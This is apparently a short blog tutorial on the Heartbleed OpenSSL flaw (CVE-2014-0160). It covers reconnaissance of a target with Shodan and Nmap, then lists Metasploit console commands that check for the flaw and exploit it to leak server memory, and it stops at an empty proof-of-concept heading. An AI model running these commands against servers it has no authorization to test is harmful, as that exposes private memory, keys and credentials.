Heartbleed vulnerability and how to exploit it using Metasploit
Tools :
- shodan.io
- Linux
- Metasploit
Heartbleed :
Heart bleed is an OpenSSL vulnerability that allows the attacker to “bleed” out whatever is in memory on the server.
Discovered by Neel Mehta of Google Security and dated 07 Apr 2014, this vulnerability is stamped CVE-2014–0160 and is called Heartbleed bug vulnerability.
You can also dump the TSL/SSL certificate for the webpage. You can modify the exploit to continuously extract data at 64 bytes at a time.
Reconnaissance :
After I have done some reconnaissance on a target using some well-known tools like Nmap, sublist3r, and censys, I have found that the target may be vulnerable to a heart bleed vulnerability.
I decided to search with the target IP on the shodan.io and also it says the same to me, the target website is using an old version of OpenSSL and it might be vulnerable.
Exploitation :
Now decided to check if the target is vulnerable or not using the Metasploit module.
$ msfconsole
> use auxiliary/scanner/ssl/openssl_heartbleed
> set RHOSTS <IP>
> set RPORT <Port>
> check
> set VERBOSE true
> exploit
Proof of concept (PoC) :
Metasploit :